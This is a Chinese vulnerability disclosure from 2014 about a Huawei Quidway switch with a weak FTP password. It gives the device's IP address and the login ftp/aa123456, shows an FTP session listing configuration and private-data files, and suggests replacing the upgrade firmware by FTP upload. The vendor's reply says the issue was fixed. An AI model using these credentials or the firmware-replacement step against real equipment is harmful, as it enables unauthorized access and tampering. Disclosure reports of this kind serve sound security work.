漏洞详情

披露状态:

2014-04-26: 细节已通知厂商并且等待厂商处理中
2014-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

标题应该没侧漏吧

详细说明:

地址:221.226.56.34

ftp弱口令 ftp/aa123456



该设备为 华​为​Q​u​i​d​w​a​y​自​研​以​太​网​交​换​机

VRP版本升级需利用到ftp上传文件,因此可以上传替换掉升级程序

设备的文档我是参考这里的:http://wenku.baidu.com/view/26359187bceb19e8b8f6bae0.html

漏洞证明:

里面有

ftp> open 221.226.56.34
用户(221.226.56.34:(none)): ftp
密码:
ftp> ls
sup.bin
license.txt
private-data.txt
ssl_vpn_cfg.zip
vrpcfg.zip
patchnpstate.dat
fanghuoqiang.cfg
vrpcfg.cfg
vrpcfg20131122.cfg
vrpcfg20131212.cfg
vrpcfg2014-01-07.cfg
vrpcfg20140113.cfg



1.png

修复方案:

你懂的,弱口令

版权声明:转载请注明来源 Mody@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-28 09:57

厂商回复:

硬件配置问题已经解决。

最新状态:

暂无


漏洞评价: